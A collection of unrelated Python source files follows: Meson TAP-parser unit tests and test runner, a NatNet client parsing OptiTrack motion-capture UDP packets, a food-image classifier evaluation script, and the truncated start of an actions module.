def test_directive_explanation(self):
events = self.parse_tap('ok 1 abc # skip why')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP,
explanation='why')
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo Because')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS,
explanation='Because')
self.assert_last(events)
def test_one_test_early_plan(self):
events = self.parse_tap('1..1\nok')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_late_plan(self):
events = self.parse_tap('ok\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_out_of_order(self):
events = self.parse_tap('ok 2')
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_middle_plan(self):
events = self.parse_tap('ok 1\n1..2\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=2, late=True)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many_plans(self):
events = self.parse_tap('1..1\n1..2\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=1, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..1\nok 1\nnot ok 2')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..3')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=3, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..3\nok 1\nnot ok 2')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few_bailout(self):
events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_bailout(events, message='no third test')
self.assert_last(events)
def test_diagnostics(self):
events = self.parse_tap('1..1\n# ignored\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_empty_line(self):
events = self.parse_tap('1..1\n\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_unexpected(self):
events = self.parse_tap('1..1\ninvalid\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_version(self):
events = self.parse_tap('TAP version 13\n')
self.assert_version(events, version=13)
self.assert_last(events)
events = self.parse_tap('TAP version 12\n')
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..0\nTAP version 13\n')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_error(events)
self.assert_last(events)
def test_yaml(self):
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_last(events)
def _clang_at_least(compiler, minver: str, apple_minver: str) -> bool:
"""
check that Clang compiler is at least a specified version, whether AppleClang or regular Clang
Parameters
----------
compiler:
Meson compiler object
minver: str
Clang minimum version
apple_minver: str
AppleClang minimum version
Returns
-------
at_least: bool
Clang is at least the specified version
"""
if isinstance(compiler, (mesonbuild.compilers.AppleClangCCompiler,
mesonbuild.compilers.AppleClangCPPCompiler)):
return version_compare(compiler.version, apple_minver)
return version_compare(compiler.version, minver)
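# Illustrative use, assuming version strings in version_compare's operator
# syntax (an assumption about the expected format, e.g. '>=9.0'):
#
# if _clang_at_least(cc, '>=9.0', '>=11.0'):
# ... enable a check that needs a recent clang ...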
def unset_envs():
# For unit tests we must fully control all command lines
# so that there are no unexpected changes coming from the
# environment, for example when doing a package build.
varnames = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.cflags_mapping.values())
for v in varnames:
if v in os.environ:
del os.environ[v]
def convert_args(argv):
# If we got passed a list of tests, pass it on
pytest_args = ['-v'] if '-v' in argv else []
test_list = []
for arg in argv:
if arg.startswith('-'):
if arg in ('-f', '--failfast'):
arg = '--exitfirst'
pytest_args.append(arg)
continue
# ClassName.test_name => 'ClassName and test_name'
if '.' in arg:
arg = ' and '.join(arg.split('.'))
test_list.append(arg)
if test_list:
pytest_args += ['-k', ' or '.join(test_list)]
return pytest_args
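# For example, convert_args(['NativeFileTests.test_find_program', '-f'])
# returns ['--exitfirst', '-k', 'NativeFileTests and test_find_program'],
# so dotted unittest names select the same tests via pytest's -k matching.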
def main():
unset_envs()
try:
import pytest # noqa: F401
# Need pytest-xdist for `-n` arg
import xdist # noqa: F401
pytest_args = ['-n', 'auto', './run_unittests.py']
pytest_args += convert_args(sys.argv[1:])
return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode
except ImportError:
print('pytest or pytest-xdist not found, using unittest instead')
# All attempts at locating pytest failed, fall back to plain unittest.
cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests',
'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests',
'TAPParserTests',
'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests',
'WindowsTests', 'DarwinTests']
return unittest.main(defaultTest=cases, buffer=True)
if __name__ == '__main__':
print('Meson build system', mesonbuild.coredata.version, 'Unit Tests')
raise SystemExit(main())
|
NatNetClient.py
|
import sys
import time
import socket
import struct
import timecode
from threading import Thread
def trace(*args):
pass  # tracing disabled; to enable: print(' '.join(str(arg) for arg in args))
# Create structs for reading various object types to speed up parsing.
ShortValue = struct.Struct('<h')
IntegerValue = struct.Struct('<i')
UnsignedIntegerValue = struct.Struct('<I')
UnsignedLongValue = struct.Struct('<Q')
FloatValue = struct.Struct('<f')
DoubleValue = struct.Struct('<d')
Vector3 = struct.Struct('<fff')
Quaternion = struct.Struct('<ffff')
class NatNetClient:
def __init__(self, serverIP):
# The IP address of the NatNet server (e.g. the machine running Motive).
self.serverIPAddress = serverIP
# This should match the multicast address listed in Motive's streaming settings.
self.multicastAddress = "239.255.42.99"
# NatNet Command channel
self.commandPort = 1510
# NatNet Data channel
self.dataPort = 1511
# Set this to a callback method of your choice to receive per-rigid-body data at each frame.
self.rigidBodyListener = None
self.newFrameListener = None
# NatNet stream version. This will be updated to the actual version the server is using during initialization.
self.__natNetStreamVersion = (3,0,0,0)
# Conversion from ID to name
self.__names = {}
# Client/server message ids
NAT_PING = 0
NAT_PINGRESPONSE = 1
NAT_REQUEST = 2
NAT_RESPONSE = 3
NAT_REQUEST_MODELDEF = 4
NAT_MODELDEF = 5
NAT_REQUEST_FRAMEOFDATA = 6
NAT_FRAMEOFDATA = 7
NAT_MESSAGESTRING = 8
NAT_DISCONNECT = 9
NAT_UNRECOGNIZED_REQUEST = 100
# Assets ids
NAT_MARKERSET = 0
NAT_RIGIDBODY = 1
NAT_SKELETON = 2
##################################################################################################
# UDP SOCKETS
##################################################################################################
# Create a data socket to attach to the NatNet stream (get data from Motive)
def __createDataSocket(self, port):
result = socket.socket(socket.AF_INET, # Internet
socket.SOCK_DGRAM,
socket.IPPROTO_UDP) # UDP
result.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
result.bind(('', port))
mreq = struct.pack("4sl", socket.inet_aton(self.multicastAddress), socket.INADDR_ANY)
result.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
return result
# Create a command socket to attach to the NatNet stream (ask for data to Motive)
def __createCommandSocket(self):
result = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
result.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
result.bind(('', 0))
result.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
return result
#####################################################################################################
# ASSETS (RIGID BODIES, SKELETONS)
#####################################################################################################
# Unpack a rigid body object from a data packet
def __unpackRigidBody(self, data):
offset = 0
# ID (4 bytes)
id_, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("ID:", id_)
# Position and orientation
pos = Vector3.unpack(data[offset:offset+12])
offset += 12
trace("\tPosition: {:.3f} {:.3f} {:.3f}".format(pos[0], pos[1], pos[2]))
rot = Quaternion.unpack(data[offset:offset+16])
offset += 16
trace("\tOrientation: {:.3f} {:.3f} {:.3f} {:.3f}".format(rot[0], rot[1], rot[2], rot[3]))
# Mean markers error
if (self.__natNetStreamVersion[0] >= 2):
markerError, = FloatValue.unpack(data[offset:offset+4])
offset += 4
trace("\tMarker Error:", markerError)
# Version 2.6 and later
trackingValid = False  # default for older streams that do not carry the params field
if (((self.__natNetStreamVersion[0] == 2) and (self.__natNetStreamVersion[1] >= 6)) or self.__natNetStreamVersion[0] > 2 or self.__natNetStreamVersion[0] == 0):
param, = ShortValue.unpack(data[offset:offset+2])
trackingValid = (param & 0x01) != 0
offset += 2
trace("\tTracking Valid:", trackingValid)
# Send information to any listener.
if self.rigidBodyListener is not None:
name = self.__names[id_] if id_ in self.__names.keys() else "Unknown"
self.rigidBodyListener(id_, name, trackingValid, pos, rot)
return offset
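# To summarize the layout read above: int32 id, 3x float32 position,
# 4x float32 quaternion, then (stream >= 2.0) a float32 mean marker error and
# (stream >= 2.6) an int16 params field whose bit 0 means "tracking valid".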
# Unpack a skeleton object from a data packet
def __unpackSkeleton(self, data):
offset = 0
# ID
id_, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("ID:", id_)
# Bones number
rigidBodyCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("Rigid Body Count:", rigidBodyCount)
# Extract each bone as a rigid body
for j in range(0, rigidBodyCount):
offset += self.__unpackRigidBody(data[offset:])
return offset
#############################################################################################################
# MOCAP DATA (MARKERS, VERSION, TIME STAMP, ...)
#############################################################################################################
# Unpack data from a motion capture frame message
def __unpackMocapData(self, data):
trace("Begin MoCap Frame\n-----------------")
offset = 0
# Frame number (4 bytes)
frameNumber, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("Frame #:", frameNumber)
# Marker set count (4 bytes)
markerSetCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("Marker Set Count:", markerSetCount)
# Loop over marker sets
for i in range(0, markerSetCount):
# Model name
modelName, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(modelName) + 1
trace("Model Name:", modelName.decode('utf-8'))
# Marker count (4 bytes)
markerCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("Marker Count:", markerCount)
for j in range(0, markerCount):
pos = Vector3.unpack(data[offset:offset+12])
offset += 12
trace("\tMarker {}: {:.3f}, {:.3f}, {:.3f}".format(j, pos[0], pos[1], pos[2]))
##################################
# UNLABELED MARKERS (DEPRECATED) #
##################################
# Unlabeled markers count (4 bytes)
unlabeledMarkersCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
#trace("Unlabeled Markers Count:", unlabeledMarkersCount)
for i in range(0, unlabeledMarkersCount):
pos = Vector3.unpack(data[offset:offset+12])
offset += 12
#trace("\tMarker {}: {:.3f}, {:.3f}, {:.3f}".format(j, pos[0], pos[1], pos[2]))
################
# RIGID BODIES #
################
# Rigid body count (4 bytes)
rigidBodyCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("Rigid Body Count:", rigidBodyCount)
for i in range(0, rigidBodyCount):
offset += self.__unpackRigidBody(data[offset:])
#############
# SKELETONS #
#############
skeletonCount = 0
# Version 2.1 and later
if ((self.__natNetStreamVersion[0] == 2 and self.__natNetStreamVersion[1] > 0) or self.__natNetStreamVersion[0] > 2):
skeletonCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("Skeleton Count:", skeletonCount)
for i in range(0, skeletonCount):
offset += self.__unpackSkeleton(data[offset:])
####################
# LABELLED MARKERS #
####################
labeledMarkerCount = 0
# Version 2.3 and later
if ((self.__natNetStreamVersion[0] == 2 and self.__natNetStreamVersion[1] > 3) or self.__natNetStreamVersion[0] > 2):
labeledMarkerCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("Labeled Marker Count:", labeledMarkerCount)
for i in range(0, labeledMarkerCount):
markerID, = ShortValue.unpack(data[offset:offset+2])
modelID, = ShortValue.unpack(data[offset+2:offset+4])
offset += 4
pos = Vector3.unpack(data[offset:offset+12])
offset += 12
size, = FloatValue.unpack(data[offset:offset+4])
offset += 4
trace("\tID: [MarkerID {}] [ModelID {}]".format(markerID, modelID))
trace("\tPosition: {:.3f} {:.3f} {:.3f}".format(pos[0], pos[1], pos[2]))
trace("\tSize: {:.3f})".format(size))
# Version 2.6 and later
if ((self.__natNetStreamVersion[0] == 2 and self.__natNetStreamVersion[1] >= 6) or self.__natNetStreamVersion[0] > 2):
params, = ShortValue.unpack(data[offset:offset+2])
offset += 2
occluded = (params & 0x01) != 0
pointCloudSolved = (params & 0x02) != 0
modelSolved = (params & 0x04) != 0
trace("\tSolved:", occluded, pointCloudSolved, modelSolved)
# Version 3.0 and later
if (self.__natNetStreamVersion[0] >= 3):
hasModel = (params & 0x08) != 0
unlabeled = (params & 0x10) != 0
active = (params & 0x20) != 0
trace("\tModel:", hasModel, unlabeled, active)
# Version 3.0 and later
if (self.__natNetStreamVersion[0] >= 3):
residual, = FloatValue.unpack(data[offset:offset+4])
offset += 4
trace("\tResidual:", residual)
####################
# FORCE PLATE DATA #
####################
# Force Plate data (version 2.9 and later)
if ((self.__natNetStreamVersion[0] == 2 and self.__natNetStreamVersion[1] >= 9) or self.__natNetStreamVersion[0] > 2):
forcePlateCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("Force Plate Count:", forcePlateCount)
for i in range(0, forcePlateCount):
# ID
forcePlateID, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("Force Plate {}: {}".format(i, forcePlateID))
# Channel Count
forcePlateChannelCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
# Channel Data
for j in range(0, forcePlateChannelCount):
trace("\tChannel {}: {}".format(j, forcePlateID))
forcePlateChannelFrameCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
for k in range(0, forcePlateChannelFrameCount):
forcePlateChannelVal, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("\t\t", forcePlateChannelVal)
###############
# DEVICE DATA #
###############
# Device data (version 2.11 and later)
if ((self.__natNetStreamVersion[0] == 2 and self.__natNetStreamVersion[1] >= 11) or self.__natNetStreamVersion[0] > 2):
deviceCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("Device Count:", deviceCount)
for i in range(0, deviceCount):
# ID
deviceID, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("Device {}: {}".format(i, deviceID))
# Channel Count
deviceChannelCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
# Channel Data
for j in range(0, deviceChannelCount):
trace("\tChannel {}: {}", j, deviceID)
deviceChannelFrameCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
for k in range(0, deviceChannelFrameCount):
deviceChannelVal, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("\t\t", deviceChannelVal)
##############
# PARAMETERS #
##############
if (self.__natNetStreamVersion[0] < 3):
softwareLatency, = FloatValue.unpack(data[offset:offset+4])
offset += 4
trace("Software latency:", softwareLatency)
# Timecode
tc, = UnsignedIntegerValue.unpack(data[offset:offset+4])
offset += 4
sub, = UnsignedIntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("Timecode:", tc, sub)
# Timestamp (increased to double precision in 2.7 and later)
if ((self.__natNetStreamVersion[0] == 2 and self.__natNetStreamVersion[1] >= 7) or self.__natNetStreamVersion[0] > 2):
timestamp, = DoubleValue.unpack(data[offset:offset+8])
offset += 8
else:
timestamp, = FloatValue.unpack(data[offset:offset+4])
offset += 4
trace("Timestamp:", timestamp)
# High res Timestamp (Version 3.0 and later)
if ((self.__natNetStreamVersion[0] >= 3)):
stampCameraExposure, = UnsignedLongValue.unpack(data[offset:offset+8])
offset += 8
stampDataReceived, = UnsignedLongValue.unpack(data[offset:offset+8])
offset += 8
stampTransmit, = UnsignedLongValue.unpack(data[offset:offset+8])
offset += 8
trace("Mid-exposure timestamp:", stampCameraExposure)
trace("Camera data received timestamp :", stampDataReceived)
trace("Transmit timestamp :", stampTransmit)
# Frame parameters
param, = ShortValue.unpack(data[offset:offset+2])
isRecording = (param & 0x01) != 0
trackedModelsChanged = (param & 0x02) != 0
offset += 2
trace("Frame parameters:", isRecording, trackedModelsChanged)
# End of data tag
eod, = IntegerValue.unpack(data[offset:offset+4])
trace("-----------------\nEnd MoCap Frame")
# Send information to any listener.
if self.newFrameListener is not None:
self.newFrameListener(frameNumber, markerSetCount, unlabeledMarkersCount, rigidBodyCount, skeletonCount,
labeledMarkerCount, tc, sub, timestamp, isRecording, trackedModelsChanged)
##############################################################################################################################
# ASSETS DESCRIPTIONS
##############################################################################################################################
# Unpack a marker set description packet
def __unpackMarkerSetDescription(self, data):
offset = 0
# Marker set info
name, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(name) + 1
trace("\tName:", name.decode('utf-8'))
# Number of markers
markerCount, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
# Unpack each marker
for i in range(0, markerCount):
name, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(name) + 1
trace("\tMarker Name:", name.decode('utf-8'))
return offset
# Unpack a rigid body description packet
def __unpackRigidBodyDescription(self, data):
offset = 0
# Body label (Version 2.0 or higher)
if self.__natNetStreamVersion[0] >= 2:
name, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(name) + 1
trace("\tName:", name.decode('utf-8'))
id_, = IntegerValue.unpack(data[offset:offset+4])
trace("\tID:", id_)
offset += 4
# Update the ID-to-name correspondence
self.__names[id_] = name
# Parent ID
parentID, = IntegerValue.unpack(data[offset:offset+4])
trace("\tParent ID:", parentID)
offset += 4
# Position offset from the parent body (3 floats); note this is not actually a timestamp
timestamp = Vector3.unpack(data[offset:offset+12])
trace("\tOffset from parent:", timestamp)
offset += 12
# Per-marker data (Version 3.0 or higher)
if self.__natNetStreamVersion[0] >= 3:
# Number of markers
nMarkers, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
# Markers position (3 floats / marker)
positions = []
for i in range(nMarkers):
position = Vector3.unpack(data[offset:offset+12])
positions.append(position)
offset += 12
# Marker required label (1 int / label)
required_labels = []
for i in range(nMarkers):
required_label, = IntegerValue.unpack(data[offset:offset+4])
required_labels.append(required_label)
offset += 4
# Display
trace('\tMarkers:')
for i in range(nMarkers):
x, y, z = positions[i]
label = required_labels[i]
trace('\t\t{:.2f}, {:.2f}, {:.2f} ({})'.format(x, y, z, label))
return offset
# Unpack a skeleton description packet
def __unpackSkeletonDescription(self, data):
offset = 0
# Info
name, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(name) + 1
trace("\tName:", name.decode('utf-8'))
# ID
id_, = IntegerValue.unpack(data[offset:offset+4])
trace("\tID:", id_)
offset += 4
# Number of bones
rigidBodyCount, = IntegerValue.unpack(data[offset:offset+4])
trace("\tNumber of bones:", rigidBodyCount)
offset += 4
# Unpack bones as rigid bodies
for i in range(0, rigidBodyCount):
offset += self.__unpackRigidBodyDescription(data[offset:])
return offset
# Unpack a data description packet
def __unpackDataDescriptions(self, data):
offset = 0
# Number of assets
datasetCount, = IntegerValue.unpack(data[offset:offset+4])
trace('dataset count:', datasetCount)
offset += 4
# Reset the ID-to-name correspondence
self.__names = {}
# Extract assets
for i in range(0, datasetCount):
# Asset type (marker set = 0, rigid body = 1, skeleton = 2)
asset, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
# Unpack asset
if asset == self.NAT_MARKERSET:
trace('Asset ', str(i)+': Marker Set')
offset += self.__unpackMarkerSetDescription(data[offset:])
elif asset == self.NAT_RIGIDBODY:
trace('Asset ', str(i)+': Rigid Body')
offset += self.__unpackRigidBodyDescription(data[offset:])
elif asset == self.NAT_SKELETON:
trace('Asset ', str(i)+': Skeleton')
offset += self.__unpackSkeletonDescription(data[offset:])
##################################################################################################
# MAIN LOOP
##################################################################################################
def __dataThreadFunction(self, socket):
while True:
data, addr = socket.recvfrom(32768)
if (len(data) > 0):
self.__processMessage(data)
def __processMessage(self, data):
trace("Begin Packet\n------------")
#
# MESSAGE STRUCTURE: ID (2 bytes) SIZE (2 bytes) DATA (size bytes)
#
# See __init__ for messages IDs, DATA is the message content
#
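# For example, a header of b'\x07\x00\x10\x00' (two little-endian shorts)
# announces a NAT_FRAMEOFDATA message carrying a 16-byte payload.
#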
# Message type
messageID, = ShortValue.unpack(data[0:2])
trace("Message ID: ", messageID)
# Message size
packetSize, = ShortValue.unpack(data[2:4])
trace("Packet Size: ", packetSize)
offset = 4
# Unpack message
if (messageID == self.NAT_FRAMEOFDATA):
self.__unpackMocapData(data[offset:])
elif (messageID == self.NAT_MODELDEF):
self.__unpackDataDescriptions(data[offset:])
elif (messageID == self.NAT_PINGRESPONSE):
offset += 256 # Skip the sending app's Name field
offset += 4 # Skip the sending app's Version info
self.__natNetStreamVersion = struct.unpack('BBBB', data[offset:offset+4])
trace('NatNet version: ', self.__natNetStreamVersion)
offset += 4
elif (messageID == self.NAT_RESPONSE):
if (packetSize == 4):
commandResponse, = IntegerValue.unpack(data[offset:offset+4])
offset += 4
trace("Command response:", commandResponse)
else:
message, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(message) + 1
trace("Command response:", message.decode('utf-8'))
elif (messageID == self.NAT_UNRECOGNIZED_REQUEST):
trace("Received 'Unrecognized request' from server")
elif (messageID == self.NAT_MESSAGESTRING):
message, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(message) + 1
trace("Received message from server:", message.decode('utf-8'))
else:
trace("ERROR: Unrecognized packet type")
trace("----------\nEnd Packet\n")
##############################################################################################
# SERVER REQUESTS
##############################################################################################
# Send command to server
def sendCommand(self, command, commandStr, socket, address):
# Auto-fill commandStr for known commands
if (command == self.NAT_REQUEST_MODELDEF or command == self.NAT_REQUEST_FRAMEOFDATA):
packetSize = 0
commandStr = ""
elif (command == self.NAT_REQUEST):
packetSize = len(commandStr) + 1
elif (command == self.NAT_PING):
commandStr = "Ping"
packetSize = len(commandStr) + 1
# Pack command and packet size as header
data = IntegerValue.pack(command)
data += IntegerValue.pack(packetSize)
# Encode as UTF-8 and append a terminating null byte
data += commandStr.encode('utf-8')
data += b'\0'
# Send command over command port
socket.sendto(data, address)
# Return NatNetVersion
def getVersion(self):
return self.__natNetStreamVersion
##################################################################################################
# INIT
##################################################################################################
def run(self):
# Create the data socket
self.dataSocket = self.__createDataSocket(self.dataPort)
if (self.dataSocket is None):
print("Could not open data channel")
sys.exit(1)
# Create the command socket
self.commandSocket = self.__createCommandSocket()
if (self.commandSocket is None):
print("Could not open command channel")
sys.exit(1)
# Create a separate thread for receiving data packets
dataThread = Thread(target = self.__dataThreadFunction, args = (self.dataSocket,))
#dataThread.setDaemon(True)
dataThread.start()
# Create a separate thread for receiving command packets
commandThread = Thread(target = self.__dataThreadFunction, args = (self.commandSocket,))
#commandThread.setDaemon(True)
commandThread.start()
# Ping server to get NatNet version
self.sendCommand(self.NAT_PING, "", self.commandSocket, (self.serverIPAddress, self.commandPort))
# Request model definition (correspondence label <-> id)
self.sendCommand(self.NAT_REQUEST_MODELDEF, "", self.commandSocket, (self.serverIPAddress, self.commandPort))
################################################################################################
# TEST
################################################################################################
if __name__ == "__main__":
# This will create a new NatNet client
streamingClient = NatNetClient("127.0.0.1")
# Start up the streaming client
streamingClient.run()
# Infinite loop
while True:
time.sleep(1)
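# A fuller demo might attach callbacks before calling run(); the signature
# below matches what __unpackRigidBody passes to its listener:
#
# def on_rigid_body(id_, name, trackingValid, pos, rot):
# print(name, pos, rot)
#
# streamingClient.rigidBodyListener = on_rigid_body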
|
auto_detect.py
|
##
## python auto_detect.py --srcdir srcfilePath --outdir result --num 10 --threshold 0.80
## --srcdir pictures for testing
## --outdir output dir for results
## --num number of files to sample from every dir
## --threshold score threshold for counting a match
##
##
## 3 classes: class0 = no dish, class1 = the current dish, class2 = other dishes
##
import argparse
import os
from trainer import Trainer
from utils import Utils
from const import const
from food_net import FoodNet
import time
import multiprocessing
from pdb import set_trace
from numpy import *
#import psutil
#import objgraph
fileList = []
def test_sub_process(output_path, test_num, threshold, test_list, result_list):
print ("test process start...")
output = open(output_path, "w")
foodnet = FoodNet(const.GRAPH, const.LABELS);
for testdir in test_list: # test other dir
output.write("%s,\n" % (os.path.basename(testdir)))
test_files = []
listfile = os.listdir(testdir)
for i in range(test_num):
randint = random.randint(0, len(listfile))  # numpy randint: upper bound is exclusive, so all indices are reachable
# print('[%d] %s' % (i, listfile[randint]))
test_files.append(os.path.join(testdir, listfile[randint]))
result = foodnet.label_files(test_files)
result.sort(key=lambda x: x[1], reverse=True)
        match_count = 0
        for k in result:
            output.write(",%s,,%f\n" % (os.path.basename(k[0]), k[1]))
            if k[1] > threshold:
                match_count += 1
        output.write("%d,\n" % (match_count))
        print('%s : %d' % (os.path.basename(testdir), match_count))
#print(psutil.Process(os.getpid()).memory_info())
#objgraph.show_growth(limit=4)
#objgraph.show_refs(foodnet, filename='sample-backref-graph.png')
        result_list.append((os.path.basename(testdir), match_count))
foodnet.close()
print ("test process finish...")
output.close()
pass
def test_others(cur_dir, dir_list):
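    # Scores samples from every directory in `dir_list` in a child process
    # (see test_sub_process) and writes the ranked match counts for `cur_dir`
    # to the shared result file.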
output_path = os.path.join(outdir, cur_dir + ".csv")
result_array = []
with multiprocessing.Manager() as manager:
test_list = manager.list()
test_list.extend(dir_list)
result_list = manager.list()
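        # The Manager proxies make these lists visible across the process boundary:
        # the child appends into result_list and the parent reads it back after join();
        # a plain Python list would not be shared with the spawned process.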
p_label = multiprocessing.Process(target=test_sub_process, args=(output_path, int(num), float(threshold), test_list,result_list))
p_label.start()
p_label.join()
result_array.extend(result_list)
result_array.sort(key=lambda x: x[1], reverse=True)
for k in result_array:
resultfile.write(",%s,,%d\n" % (k[0], k[1]))
resultfile.flush()
if __name__ == '__main__':
srcdir = "./"
outdir = "result"
num = 10
    threshold = 0.90
    dict = []
    const.ROOTDIR = os.getcwd()
parser = argparse.ArgumentParser()
parser.add_argument("--srcdir", help="src dir")
parser.add_argument("--outdir", help="output dir")
    parser.add_argument("--num", help="number of images to sample from each dir")
    parser.add_argument("--threshold", help="score threshold for counting a match")
FLAGS, unparsed = parser.parse_known_args()
print(FLAGS)
print(type(FLAGS))
args = parser.parse_args()
if args.srcdir:
srcdir = args.srcdir
if args.outdir:
outdir = args.outdir
if args.num:
num = args.num
if args.threshold:
threshold = float(args.threshold)
#Utils.removeSubFilesInDir(outdir) # clean out files last time
if not os.path.exists(outdir):
os.makedirs(outdir)
#Trainer.clean() # clean training files last time
#Utils.removeSubFilesInDir(const.TRAIN_OTHER) # clean out files last time
#Utils.removeSubFilesInDir(const.TRAIN_NEG)
fileList = os.listdir(srcdir)
print(fileList)
dirnum = len(fileList)
if dirnum == 0:
exit(0)
start = time.time()
#Utils.copyDir(const.NEG_PICTURES, const.TRAIN_NEG)
result_path = os.path.join(outdir, const.RESULTFILE)
resultfile = open(result_path, "w")
for i in range(dirnum - 1): # training every dir
traindir = os.path.join(srcdir, fileList[i])
if not os.path.isdir(traindir):
print(fileList[i] + ' is not a dir')
continue
for j in range(1, dirnum):
if j == i:
continue
otherdir = os.path.join(srcdir, fileList[j])
if not os.path.isdir(otherdir):
continue
Utils.randomCopyFile(otherdir, const.TRAIN_OTHER, int(num))
resultfile.write("%s\n" % (fileList[i]))
#Trainer.train(traindir)
        dir_list = []
for j in range(i + 1, dirnum): # test other dir
testdir = os.path.join(srcdir, fileList[j])
if not os.path.isdir(testdir):
print(fileList[j] + ' is not a dir')
continue
dir_list.append(testdir)
test_others(fileList[i], dir_list)
#Trainer.clean()
Utils.removeSubFilesInDir(const.TRAIN_OTHER)
#set_trace()
resultfile.close()
#Utils.removeSubFilesInDir(const.TRAIN_NEG)
end = time.time()
print('\n finish time : {:.3f}s\n'.format(end - start))
|
actions_implementation.py
|
import threading
import time
import random
def timer(seconds, var, oldValue):
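    # Sleep for `seconds`, then set the property dict's 'value' back to `oldValue`.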
time.sleep(int(seconds))
var['value'] = oldValue
def fade_out(device):
